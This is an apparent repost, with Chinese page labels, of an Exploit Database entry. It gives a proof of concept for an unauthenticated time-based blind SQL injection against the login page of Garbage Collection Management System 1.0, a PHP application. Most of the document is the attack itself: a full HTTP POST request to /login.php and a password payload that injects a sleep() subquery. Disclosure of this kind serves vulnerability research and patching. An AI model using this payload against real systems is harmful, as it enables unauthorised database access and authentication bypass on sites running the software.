Garbage Collection Management System 1.0 – SQL Injection (Unauthenticated)

• Exploit Database
• 34 阅读

• 作者： ircashem
  日期： 2021-07-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50085/

• # Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
  # Exploit Author: ircashem
  # Date 02.07.2021
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
  # Version 1.0
  # Tested on: Ubuntu 20.04
  
  ####################
  # Proof of Concept #
  ####################
  
  POST /login.php HTTP/1.1
  Content-Length: 456
  Host: localhost 
  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
  Origin: http://localhost
  DNT: 1
  Referer: http://localhost/
  Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
  Upgrade-Insecure-Requests: 1
  Sec-GPC: 1
  Connection: close
  
  -----------------------------238993435340593308934076060075
  Content-Disposition: form-data; name="username"
  
  admin
  -----------------------------238993435340593308934076060075
  Content-Disposition: form-data; name="password"
  
  admin' AND (SELECT 1 from (select sleep(5))a) -- -
  -----------------------------238993435340593308934076060075
  Content-Disposition: form-data; name="submit"
  
  
  -----------------------------238993435340593308934076060075--
  
  ###########
  # Payload #
  ###########
  
  username=admin
  password=admin' AND (SELECT 1 from (select sleep(5))a) -- -